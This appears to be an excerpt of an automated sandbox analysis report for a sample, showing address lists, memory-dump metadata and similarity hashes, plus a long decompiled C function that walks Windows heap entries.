                                                                                                                              0x1d7d5b53
                                                                                                                              0x1d7d5b36
                                                                                                                              0x1d7d5b12
                                                                                                                              0x1d7d5af5
                                                                                                                              0x1d7d5ad3
                                                                                                                              0x1d7d5aca
                                                                                                                              0x1d7d5a8b
                                                                                                                              0x1d7d5a0e
                                                                                                                              0x1d7d5a0e
                                                                                                                              0x1d7d5a14
                                                                                                                              0x1d7d5a18
                                                                                                                              0x1d7d5a19
                                                                                                                              0x1d7d5a1a
                                                                                                                              0x1d7d5a1f
                                                                                                                              0x1d7d5a20
                                                                                                                              0x1d7d5a29
                                                                                                                              0x1d7d5a2d
                                                                                                                              0x1d7d5a59
                                                                                                                              0x1d7d5a2f
                                                                                                                              0x1d7d5a2f
                                                                                                                              0x1d7d5a33
                                                                                                                              0x1d7d5a38
                                                                                                                              0x1d7d5a38
                                                                                                                              0x1d7d5a3c
                                                                                                                              0x1d7d5a41
                                                                                                                              0x1d7d5a4d
                                                                                                                              0x1d7d5a52
                                                                                                                              0x1d7d5a52
                                                                                                                              0x1d7d5a2d
                                                                                                                              0x1d7d59da
                                                                                                                              0x1d7d59da
                                                                                                                              0x1d7d59de
                                                                                                                              0x1d7d59e3
                                                                                                                              0x1d7d59e7
                                                                                                                              0x1d7d59ec
                                                                                                                              0x1d7d59ec
                                                                                                                              0x1d7d59ec
                                                                                                                              0x1d7d59d8
                                                                                                                              0x1d7d5b9c
                                                                                                                              0x1d7d5b9d
                                                                                                                              0x1d7d5b9e
                                                                                                                              0x1d7d5ba9

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Log$RXACT
                                                                                                                              • API String ID: 2994545307-2401810139
                                                                                                                              • Opcode ID: aa581fa6fc062f035d080dd200c4f4927ce14788ca0375232d5cf39e1ffcfe4d
                                                                                                                              • Instruction ID: 39e37aa55d3f42a624a4014ba2703f4bded02952ae2ae8e95c6b782986bcfe79
                                                                                                                              • Opcode Fuzzy Hash: aa581fa6fc062f035d080dd200c4f4927ce14788ca0375232d5cf39e1ffcfe4d
                                                                                                                              • Instruction Fuzzy Hash: 3C714771108785AFD311CF54D884E6BBBECFF89664F01492AF68497260D771ED048BA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D81B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 1D81B5C4
                                                                                                                              • RedirectedKey, xrefs: 1D81B60E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                              • API String ID: 0-1388552009
                                                                                                                              • Opcode ID: cf23c02fc9859ab427706e077900ddbaf35853e3905a608cbf258c2b6fb2fe74
                                                                                                                              • Instruction ID: 25649bf7d523f49b58c1396232baddf4747a89c802f0384008090624dd5b7a51
                                                                                                                              • Opcode Fuzzy Hash: cf23c02fc9859ab427706e077900ddbaf35853e3905a608cbf258c2b6fb2fe74
                                                                                                                              • Instruction Fuzzy Hash: 5061F6B5C00269EFDF11DF94C888ADEBBB8FF09750F10455AE409E7250D734AA49DBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7E9C98 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 74%
                                                                                                                              			E1D7E9C98(signed int __ecx, signed int* __edx, char _a4) {
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed char _t259;
				signed int _t260;
				char* _t261;
				intOrPtr _t263;
				signed int _t267;
				signed char _t268;
				unsigned int _t269;
				signed int _t273;
				signed char _t277;
				signed short _t279;
				signed short _t284;
				signed char _t285;
				unsigned int _t286;
				signed short _t288;
				signed short _t290;
				signed char _t291;
				intOrPtr _t292;
				signed int _t293;
				signed char _t294;
				unsigned int _t298;
				intOrPtr* _t299;
				signed int _t300;
				unsigned int _t301;
				signed short _t302;
				signed short _t303;
				signed int _t306;
				signed short _t309;
				signed short _t321;
				signed char _t324;
				signed short _t325;
				signed int _t327;
				void* _t328;
				signed short _t332;
				signed int _t334;
				void* _t335;
				signed short _t339;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t354;
				signed short _t357;
				signed int _t364;
				signed int _t371;
				signed short _t372;
				intOrPtr* _t373;
				signed short _t376;
				signed char _t378;
				signed short _t379;
				signed short _t380;
				signed int _t385;
				signed int _t388;
				signed int _t395;
				signed char _t397;
				signed short _t400;
				signed int _t401;
				signed short _t402;
				signed short _t403;
				signed short _t404;
				signed short _t405;
				intOrPtr _t409;
				signed int _t410;
				signed char _t411;
				signed int _t412;
				unsigned int _t417;
				unsigned int _t425;
				signed int _t436;
				signed int _t437;
				signed char _t438;
				signed int _t440;
				intOrPtr _t444;
				signed int _t445;
				void* _t449;
				intOrPtr _t452;
				signed int _t454;
				void* _t455;
				signed short _t456;
				unsigned int _t457;
				intOrPtr _t458;
				intOrPtr* _t461;

				_t460 = __ecx;
				_t391 = __edx;
				if(( *(__ecx + 0x44) & 0x01000000) != 0) {
					_t461 =  *0x1d833764; // 0x0
					 *0x1d8391e0(__ecx, __edx);
					return  *_t461();
				}
				__eflags =  *(__ecx + 0x40) & 0x61000000;
				asm("bt dword [esi+0x40], 0x1c");
				__eflags = (_t255 & 0xffffff00 | ( *(__ecx + 0x40) & 0x61000000) >= 0x00000000) & (__ecx & 0xffffff00 | __eflags != 0x00000000);
				if(__eflags == 0) {
					L5:
					_v12 = _v12 & 0x00000000;
					_t257 =  *_t391;
					_t394 = 2;
					__eflags = _t257;
					if(_t257 != 0) {
						_t436 = _t391[2] & 0x0000ffff;
						__eflags = _t436 & 0x00001002;
						if((_t436 & 0x00001002) == 0) {
							goto L25;
						}
						_t394 = _t436 & 0x00000002;
						__eflags = _t394;
						if(_t394 == 0) {
							L14:
							__eflags = _a4;
							if(_a4 == 0) {
								L17:
								_t457 = _t391[1] + _t257;
								__eflags = _t436 & 0x00001000;
								if((_t436 & 0x00001000) != 0) {
									_t27 = _t257 - 0x18; // -24
									_t394 = _t460;
									_t257 = E1D7E8214(_t460, _t27);
								}
								__eflags = _a4;
								if(_a4 == 0) {
									L21:
									_t452 =  *((intOrPtr*)(_t257 + 0x10));
									_t394 = 2;
									__eflags = _t452 - _t460 + 0xa4;
									if(_t452 == _t460 + 0xa4) {
										__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
										if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
											goto L61;
										}
										_t445 =  *(_t460 + 0xe4);
										goto L62;
									}
									_t445 = _t452 + 0xfffffff0;
									goto L62;
								} else {
									__eflags = _t457 -  *((intOrPtr*)(_t257 + 0x28));
									if(_t457 <  *((intOrPtr*)(_t257 + 0x28))) {
										goto L81;
									}
									goto L21;
								}
							}
							__eflags = _t394;
							if(_t394 == 0) {
								goto L17;
							}
							_t457 =  *(_t257 + 0x24);
							goto L81;
						} else {
							__eflags =  *((char*)(_t460 + 0xea)) - 2;
							if( *((char*)(_t460 + 0xea)) != 2) {
								_t454 = 0;
								__eflags = 0;
							} else {
								_t454 =  *(_t460 + 0xe4);
							}
							__eflags = _t257 - _t454;
							if(_t257 == _t454) {
								goto L60;
							}
							_t436 = _t391[2] & 0x0000ffff;
							goto L14;
						}
					} else {
						_t445 = _t460;
						L62:
						_t457 = 0;
						__eflags = _t445;
						if(_t445 != 0) {
							__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
							if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
								_t354 = 0;
								__eflags = 0;
							} else {
								_t354 =  *(_t460 + 0xe4);
							}
							__eflags = _t445 - _t354;
							if(_t445 == _t354) {
								E1D802527(_t460, _t391,  &_v12);
								goto L192;
							} else {
								 *_t391 = _t445;
								__eflags =  *(_t460 + 0x4c) - _t457;
								if( *(_t460 + 0x4c) == _t457) {
									_t357 =  *_t445 & 0x0000ffff;
								} else {
									_t372 =  *_t445;
									__eflags =  *(_t460 + 0x4c) & _t372;
									if(( *(_t460 + 0x4c) & _t372) != 0) {
										_t372 = _t372 ^  *(_t460 + 0x50);
										__eflags = _t372;
									}
									_t357 = _t372 & 0x0000ffff;
								}
								_t391[1] = (_t357 & 0x0000ffff) << 3;
								_t391[2] = _t394;
								_t391[2] = _t457;
								_t391[3] =  *((intOrPtr*)(_t445 + 0x20)) -  *(_t445 + 0x2c) << 0xc;
								_t364 =  *(_t445 + 0x2c) << 0xc;
								_t391[4] = _t364;
								__eflags =  *(_t445 + 0xc) & _t394;
								if(( *(_t445 + 0xc) & _t394) != 0) {
									_t371 = _t364 + 0x1000;
									__eflags = _t371;
									_t391[4] = _t371;
								}
								_t391[5] =  *((intOrPtr*)(_t445 + 0x24)) + (( !( *( *((intOrPtr*)(_t445 + 0x24)) + 2)) & 0x00000001) + 1) * 8;
								_t391[6] =  *(_t445 + 0x28);
								L81:
								__eflags = _t457;
								if(_t457 == 0) {
									goto L192;
								}
								_t268 =  *((intOrPtr*)(_t457 + 7));
								__eflags = _t268 & 0x00000040;
								if((_t268 & 0x00000040) == 0) {
									__eflags = _t268 - 4;
									if(_t268 != 4) {
										_t269 = _t457;
										L88:
										 *_t391 = _t269 + 8;
										_t438 = 2;
										_t391[2] = 1;
										__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t438;
										if( *((intOrPtr*)(_t460 + 0xea)) != _t438) {
											_t273 = 0;
											__eflags = 0;
										} else {
											_t273 =  *(_t460 + 0xe4);
										}
										__eflags = _t273;
										if(_t273 == 0) {
											L96:
											_t277 =  *(_t460 + 0x4c) >> 0x00000014 &  *(_t460 + 0x52) ^  *(_t457 + 2);
											__eflags = _t277 & 0x00000001;
											if((_t277 & 0x00000001) == 0) {
												 *_t391 = _t457 + 0x10;
												__eflags =  *(_t460 + 0x4c);
												if( *(_t460 + 0x4c) == 0) {
													_t279 =  *_t457 & 0x0000ffff;
												} else {
													_t284 =  *_t457;
													__eflags =  *(_t460 + 0x4c) & _t284;
													if(( *(_t460 + 0x4c) & _t284) != 0) {
														_t284 = _t284 ^  *(_t460 + 0x50);
														__eflags = _t284;
													}
													_t279 = _t284 & 0x0000ffff;
												}
												_t391[1] = (_t279 & 0x0000ffff) * 8 - 0x10;
												_t391[2] =  *(_t457 + 6);
												_t391[2] = 0;
												_t391[2] = 0x10;
												_t391[5] = 0x10;
												goto L192;
											}
											_t285 =  *((intOrPtr*)(_t457 + 7));
											__eflags = _t285 & 0x00000040;
											if((_t285 & 0x00000040) == 0) {
												__eflags = _t285 - 4;
												if(_t285 != 4) {
													_t286 = _t457;
													L103:
													 *_t391 = _t286 + 8;
													_t397 =  *((intOrPtr*)(_t457 + 7));
													__eflags = _t397 - 4;
													if(_t397 == 4) {
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t288 =  *_t457 & 0x0000ffff;
														} else {
															_t303 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t303;
															if(( *(_t460 + 0x4c) & _t303) != 0) {
																_t303 = _t303 ^  *(_t460 + 0x50);
																__eflags = _t303;
															}
															_t288 = _t303 & 0x0000ffff;
														}
														_t391[2] = 0x40;
														_t290 = 0x4001;
														_t391[1] =  *((intOrPtr*)(_t457 - 8)) - (_t288 & 0x0000ffff);
														_t391[2] = 0x4001;
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t400 =  *_t457 & 0x0000ffff;
														} else {
															_t302 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t302;
															if(( *(_t460 + 0x4c) & _t302) != 0) {
																_t302 = _t302 ^  *(_t460 + 0x50);
																__eflags = _t302;
															}
															_t400 = _t302 & 0x0000ffff;
															_t290 = _t391[2] & 0x0000ffff;
														}
														_t401 = _t400 & 0x0000ffff;
														_t391[2] = _t401;
														__eflags = _t438 & _t290;
														if((_t438 & _t290) == 0) {
															_t391[5] = _t401;
														}
														_t402 = _t290 & 0x0000ffff;
														L165:
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t291 =  *(_t457 + 2);
															_t403 = _t402 & 0x0000ffff;
														} else {
															_t301 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t301;
															if(( *(_t460 + 0x4c) & _t301) != 0) {
																_t301 = _t301 ^  *(_t460 + 0x50);
																__eflags = _t301;
															}
															_t403 = _t391[2] & 0x0000ffff;
															_t291 = _t301 >> 0x10;
														}
														__eflags = _t438 & _t291;
														if((_t438 & _t291) == 0) {
															_t292 =  *[fs:0x30];
															_t404 = _t403 & 0x0000ffff;
															__eflags =  *(_t292 + 0x68) & 0x00000800;
															if(( *(_t292 + 0x68) & 0x00000800) != 0) {
																_t293 =  *(_t457 + 3) & 0x000000ff;
															} else {
																_t293 = 0;
															}
															_t391[4] = _t293;
														} else {
															_t299 = E1D7E8167(_t460, _t457);
															_t391[3] =  *(_t299 + 4);
															_t391[4] =  *_t299;
															_t409 =  *[fs:0x30];
															__eflags =  *(_t409 + 0x68) & 0x00000800;
															if(( *(_t409 + 0x68) & 0x00000800) != 0) {
																_t300 =  *(_t299 + 2) & 0x0000ffff;
															} else {
																_t300 = 0;
															}
															_t391[4] = _t300;
															_t391[2] = _t391[2] | 0x00000010;
															_t404 = _t391[2] & 0x0000ffff;
														}
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t294 =  *(_t457 + 2);
															_t405 = _t404 & 0x0000ffff;
														} else {
															_t298 =  *_t457;
															__eflags =  *(_t460 + 0x4c) & _t298;
															if(( *(_t460 + 0x4c) & _t298) != 0) {
																_t298 = _t298 ^  *(_t460 + 0x50);
																__eflags = _t298;
															}
															_t405 = _t391[2] & 0x0000ffff;
															_t294 = _t298 >> 0x10;
														}
														_t391[2] = _t294 & 0xe0 | _t405;
														goto L192;
													}
													__eflags = _t397 - 3;
													if(_t397 == 3) {
														_t402 = 0x1000;
														 *_t391 =  *(_t457 + 0x18);
														_t391[5] = _t391[5] & 0x00000000;
														_t391[1] =  *(_t457 + 0x1c);
														_t391[2] = 0x10000000;
														goto L165;
													}
													__eflags = _t397 - 1;
													if(_t397 != 1) {
														_t440 =  *(_t460 + 0x4c);
														__eflags = _t440;
														if(_t440 == 0) {
															_t306 =  *_t457 & 0x0000ffff;
														} else {
															_t339 =  *_t457;
															_t440 =  *(_t460 + 0x4c);
															__eflags = _t339 & _t440;
															if((_t339 & _t440) != 0) {
																_t339 = _t339 ^  *(_t460 + 0x50);
																__eflags = _t339;
															}
															_t397 =  *((intOrPtr*)(_t457 + 7));
															_t306 = _t339 & 0x0000ffff;
														}
														_v16 = _t306;
														__eflags = _t397 - 5;
														if(_t397 != 5) {
															__eflags = _t397 & 0x00000040;
															if((_t397 & 0x00000040) == 0) {
																__eflags = (_t397 & 0x0000003f) - 0x3f;
																if((_t397 & 0x0000003f) == 0x3f) {
																	__eflags = _t397;
																	if(_t397 >= 0) {
																		__eflags = _t440;
																		if(_t440 == 0) {
																			_t309 =  *_t457 & 0x0000ffff;
																		} else {
																			_t332 =  *_t457;
																			__eflags =  *(_t460 + 0x4c) & _t332;
																			if(( *(_t460 + 0x4c) & _t332) != 0) {
																				_t332 = _t332 ^  *(_t460 + 0x50);
																				__eflags = _t332;
																			}
																			_t309 = _t332 & 0x0000ffff;
																		}
																	} else {
																		_t425 = _t457 >> 0x00000003 ^  *_t457 ^  *0x1d836964 ^ _t460;
																		__eflags = _t425;
																		if(_t425 == 0) {
																			_t334 = _t457 - (_t425 >> 0xd);
																			__eflags = _t334;
																			_t335 =  *_t334;
																		} else {
																			_t335 = 0;
																		}
																		_t309 =  *((intOrPtr*)(_t335 + 0x14));
																	}
																	_t410 =  *(_t457 + (_t309 & 0xffff) * 8 - 4);
																} else {
																	_t410 = _t397 & 0x3f;
																}
															} else {
																_t410 =  *(_t457 + 4 + (_t397 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t410 =  *(_t460 + 0x54) & 0x0000ffff ^  *(_t457 + 4) & 0x0000ffff;
														}
														_t391[1] = ((_v16 & 0x0000ffff) << 3) - _t410;
														_t391[2] =  *(_t457 + 6);
														_t391[2] = 1;
														_t411 =  *((intOrPtr*)(_t457 + 7));
														__eflags = _t411 - 5;
														if(_t411 != 5) {
															__eflags = _t411 & 0x00000040;
															if((_t411 & 0x00000040) == 0) {
																__eflags = (_t411 & 0x0000003f) - 0x3f;
																if((_t411 & 0x0000003f) == 0x3f) {
																	__eflags = _t411;
																	if(_t411 >= 0) {
																		__eflags =  *(_t460 + 0x4c);
																		if( *(_t460 + 0x4c) == 0) {
																			_t321 =  *_t457 & 0x0000ffff;
																		} else {
																			_t325 =  *_t457;
																			__eflags =  *(_t460 + 0x4c) & _t325;
																			if(( *(_t460 + 0x4c) & _t325) != 0) {
																				_t325 = _t325 ^  *(_t460 + 0x50);
																				__eflags = _t325;
																			}
																			_t321 = _t325 & 0x0000ffff;
																		}
																	} else {
																		_t417 = _t457 >> 0x00000003 ^  *_t457 ^  *0x1d836964 ^ _t460;
																		__eflags = _t417;
																		if(_t417 == 0) {
																			_t327 = _t457 - (_t417 >> 0xd);
																			__eflags = _t327;
																			_t328 =  *_t327;
																		} else {
																			_t328 = 0;
																		}
																		_t321 =  *((intOrPtr*)(_t328 + 0x14));
																	}
																	_t412 =  *(_t457 + (_t321 & 0xffff) * 8 - 4);
																} else {
																	_t412 = _t411 & 0x3f;
																}
															} else {
																_t412 =  *(_t457 + 4 + (_t411 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t412 =  *(_t460 + 0x54) & 0x0000ffff ^  *(_t457 + 4) & 0x0000ffff;
														}
														_t324 = _t391[2] & 0x0000ffff;
														_t438 = 2;
														_t391[2] = _t412;
														__eflags = _t438 & _t324;
														if((_t438 & _t324) == 0) {
															_t391[5] = _t412;
														}
														_t402 = _t324;
														goto L165;
													}
													_t391[2] = 1;
													goto L94;
												}
												_t342 =  *(_t457 + 6) & 0x000000ff;
												L99:
												_t286 = _t457 + _t342 * 8;
												goto L103;
											}
											_t342 = _t285 & 0x3f;
											__eflags = _t342;
											goto L99;
										} else {
											_t344 = E1D801FC6(_t460, _t391, _t394);
											__eflags = _t344;
											if(_t344 == 0) {
												_t438 = 2;
												goto L96;
											}
											__eflags = _t391[2] & 0x00002000;
											if((_t391[2] & 0x00002000) == 0) {
												goto L192;
											}
											L94:
											_t394 = 2;
											L25:
											__eflags =  *((intOrPtr*)(_t460 + 0xea)) - _t394;
											if( *((intOrPtr*)(_t460 + 0xea)) != _t394) {
												_t258 = 0;
												__eflags = 0;
											} else {
												_t258 =  *(_t460 + 0xe4);
											}
											__eflags = _t258;
											if(_t258 == 0) {
												L31:
												__eflags = _t391[2] & 0x00000001;
												_t395 =  *_t391;
												if((_t391[2] & 0x00000001) == 0) {
													_t394 = _t395 + 0xfffffff0;
													__eflags =  *(_t460 + 0x4c);
													if( *(_t460 + 0x4c) == 0) {
														_t456 =  *_t394 & 0x0000ffff;
													} else {
														_t376 =  *_t394;
														__eflags =  *(_t460 + 0x4c) & _t376;
														if(( *(_t460 + 0x4c) & _t376) != 0) {
															_t376 = _t376 ^  *(_t460 + 0x50);
															__eflags = _t376;
														}
														_t456 = _t376 & 0x0000ffff;
													}
													_t259 =  *(_t394 + 6);
													__eflags = _t259;
													if(_t259 == 0) {
														_t437 = _t460;
													} else {
														_t437 = (_t394 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
													}
													__eflags = _t437;
													if(_t437 == 0) {
														L191:
														_v12 = 0xc0000141;
														goto L192;
													} else {
														__eflags =  *((char*)(_t394 + 7)) - 3;
														if( *((char*)(_t394 + 7)) != 3) {
															_t267 = _t456 & 0x0000ffff;
															L80:
															_t457 = _t394 + _t267 * 8;
															goto L81;
														}
														L57:
														__eflags =  *(_t394 + 0x1c) + 0x20 + _t394 -  *((intOrPtr*)(_t437 + 0x28));
														if( *(_t394 + 0x1c) + 0x20 + _t394 <  *((intOrPtr*)(_t437 + 0x28))) {
															 *_t391 =  *(_t394 + 0x18);
															_t391[5] = _t391[5] & 0x00000000;
															_t457 = 0;
															_t391[1] =  *(_t394 + 0x1c);
															_t391[2] = 0x10000000;
															goto L81;
														}
														_t444 =  *((intOrPtr*)(_t437 + 0x10));
														__eflags = _t444 - _t460 + 0xa4;
														if(_t444 == _t460 + 0xa4) {
															L60:
															_t394 = 2;
															L61:
															_t445 = 0;
															__eflags = 0;
															goto L62;
														}
														_t445 = _t444 + 0xfffffff0;
														_t394 = 2;
														goto L62;
													}
												}
												_t394 = _t395 + 0xfffffff8;
												__eflags =  *((char*)(_t394 + 7)) - 5;
												if( *((char*)(_t394 + 7)) == 5) {
													_t394 = _t394 - (( *(_t394 + 6) & 0x000000ff) << 3);
													__eflags = _t394;
												}
												__eflags =  *((intOrPtr*)(_t394 + 7)) - 4;
												if( *((intOrPtr*)(_t394 + 7)) != 4) {
													_t378 =  *(_t394 + 6);
													__eflags = _t378;
													if(_t378 == 0) {
														_t437 = _t460;
													} else {
														_t449 = (_t394 & 0xffff0000) - ((_t378 & 0x000000ff) << 0x10);
														_t378 =  *((intOrPtr*)(_t394 + 7));
														_t437 = _t449 + 0x10000;
													}
													__eflags = _t437;
													if(_t437 == 0) {
														goto L191;
													} else {
														__eflags = _t378 - 3;
														if(_t378 == 3) {
															goto L57;
														}
														__eflags =  *(_t460 + 0x4c);
														if( *(_t460 + 0x4c) == 0) {
															_t379 =  *_t394 & 0x0000ffff;
														} else {
															_t380 =  *_t394;
															__eflags =  *(_t460 + 0x4c) & _t380;
															if(( *(_t460 + 0x4c) & _t380) != 0) {
																_t380 = _t380 ^  *(_t460 + 0x50);
																__eflags = _t380;
															}
															_t379 = _t380 & 0x0000ffff;
														}
														_t267 = _t379 & 0x0000ffff;
														goto L80;
													}
												} else {
													_t458 =  *((intOrPtr*)(_t394 - 0x18));
													_t373 = _t460 + 0x9c;
													L64:
													__eflags = _t458 - _t373;
													if(_t458 == _t373) {
														_v12 = 0x8000001a;
														goto L192;
													}
													_t457 = _t458 + 0x18;
													goto L81;
												}
											} else {
												_t385 = E1D801FC6(_t460, _t391, _t394);
												__eflags = _t385;
												if(_t385 == 0) {
													goto L31;
												}
												__eflags = _t391[2] & 0x00002000;
												if((_t391[2] & 0x00002000) == 0) {
													goto L192;
												}
												goto L31;
											}
										}
									}
									_t346 =  *(_t457 + 6) & 0x000000ff;
									L84:
									_t269 = _t457 + _t346 * 8;
									goto L88;
								}
								_t346 = _t268 & 0x3f;
								__eflags = _t346;
								goto L84;
							}
						}
						_t373 = _t460 + 0x9c;
						_t458 =  *_t373;
						goto L64;
					}
				} else {
					_t388 = E1D7F06C6(__edx, __ecx, _t455, __ecx, __eflags);
					__eflags = _t388;
					if(_t388 != 0) {
						goto L5;
					} else {
						_v12 = 0xc000000d;
						L192:
						_t260 = E1D753C40();
						__eflags = _t260;
						if(_t260 == 0) {
							_t261 = 0x7ffe0380;
						} else {
							_t261 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						__eflags =  *_t261;
						if( *_t261 != 0) {
							_t263 =  *[fs:0x30];
							__eflags =  *(_t263 + 0x240) & 0x00000001;
							if(( *(_t263 + 0x240) & 0x00000001) != 0) {
								__eflags = _v12 - 0x8000001a;
								if(_v12 != 0x8000001a) {
									E1D7FF7CF(_t460);
								}
							}
						}
						return _v12;
					}
				}
			}



























































































                                                                                                                              0x1d7e9ca2
                                                                                                                              0x1d7e9ca4
                                                                                                                              0x1d7e9cae
                                                                                                                              0x1d7e9cb2
                                                                                                                              0x1d7e9cba
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9cc0
                                                                                                                              0x1d7e9cc7
                                                                                                                              0x1d7e9cd1
                                                                                                                              0x1d7e9cd9
                                                                                                                              0x1d7e9cdb
                                                                                                                              0x1d7e9cf4
                                                                                                                              0x1d7e9cf4
                                                                                                                              0x1d7e9cf8
                                                                                                                              0x1d7e9cfc
                                                                                                                              0x1d7e9cfd
                                                                                                                              0x1d7e9cff
                                                                                                                              0x1d7e9d08
                                                                                                                              0x1d7e9d0c
                                                                                                                              0x1d7e9d12
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d1a
                                                                                                                              0x1d7e9d1a
                                                                                                                              0x1d7e9d1d
                                                                                                                              0x1d7e9d3e
                                                                                                                              0x1d7e9d3e
                                                                                                                              0x1d7e9d42
                                                                                                                              0x1d7e9d51
                                                                                                                              0x1d7e9d54
                                                                                                                              0x1d7e9d56
                                                                                                                              0x1d7e9d5c
                                                                                                                              0x1d7e9d5e
                                                                                                                              0x1d7e9d61
                                                                                                                              0x1d7e9d63
                                                                                                                              0x1d7e9d63
                                                                                                                              0x1d7e9d68
                                                                                                                              0x1d7e9d6c
                                                                                                                              0x1d7e9d77
                                                                                                                              0x1d7e9d77
                                                                                                                              0x1d7e9d82
                                                                                                                              0x1d7e9d83
                                                                                                                              0x1d7e9d85
                                                                                                                              0x1d7e9d8f
                                                                                                                              0x1d7e9d95
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d9b
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d9b
                                                                                                                              0x1d7e9d87
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d6e
                                                                                                                              0x1d7e9d6e
                                                                                                                              0x1d7e9d71
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d71
                                                                                                                              0x1d7e9d6c
                                                                                                                              0x1d7e9d44
                                                                                                                              0x1d7e9d47
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d49
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d1f
                                                                                                                              0x1d7e9d1f
                                                                                                                              0x1d7e9d26
                                                                                                                              0x1d7e9d30
                                                                                                                              0x1d7e9d30
                                                                                                                              0x1d7e9d28
                                                                                                                              0x1d7e9d28
                                                                                                                              0x1d7e9d28
                                                                                                                              0x1d7e9d32
                                                                                                                              0x1d7e9d34
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d3a
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9d3a
                                                                                                                              0x1d7e9d01
                                                                                                                              0x1d7e9d01
                                                                                                                              0x1d7e9ed3
                                                                                                                              0x1d7e9ed3
                                                                                                                              0x1d7e9ed5
                                                                                                                              0x1d7e9ed7
                                                                                                                              0x1d7e9ef1
                                                                                                                              0x1d7e9ef7
                                                                                                                              0x1d7e9f01
                                                                                                                              0x1d7e9f01
                                                                                                                              0x1d7e9ef9
                                                                                                                              0x1d7e9ef9
                                                                                                                              0x1d7e9ef9
                                                                                                                              0x1d7e9f03
                                                                                                                              0x1d7e9f05
                                                                                                                              0x1d7ea072
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9f0b
                                                                                                                              0x1d7e9f0b
                                                                                                                              0x1d7e9f0d
                                                                                                                              0x1d7e9f10
                                                                                                                              0x1d7e9f21
                                                                                                                              0x1d7e9f12
                                                                                                                              0x1d7e9f12
                                                                                                                              0x1d7e9f14
                                                                                                                              0x1d7e9f17
                                                                                                                              0x1d7e9f19
                                                                                                                              0x1d7e9f19
                                                                                                                              0x1d7e9f19
                                                                                                                              0x1d7e9f1c
                                                                                                                              0x1d7e9f1c
                                                                                                                              0x1d7e9f2a
                                                                                                                              0x1d7e9f2d
                                                                                                                              0x1d7e9f31
                                                                                                                              0x1d7e9f3e
                                                                                                                              0x1d7e9f44
                                                                                                                              0x1d7e9f47
                                                                                                                              0x1d7e9f4a
                                                                                                                              0x1d7e9f4d
                                                                                                                              0x1d7e9f4f
                                                                                                                              0x1d7e9f4f
                                                                                                                              0x1d7e9f54
                                                                                                                              0x1d7e9f54
                                                                                                                              0x1d7e9f66
                                                                                                                              0x1d7e9f6c
                                                                                                                              0x1d7e9f91
                                                                                                                              0x1d7e9f91
                                                                                                                              0x1d7e9f93
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9f99
                                                                                                                              0x1d7e9f9c
                                                                                                                              0x1d7e9f9e
                                                                                                                              0x1d7e9fab
                                                                                                                              0x1d7e9fad
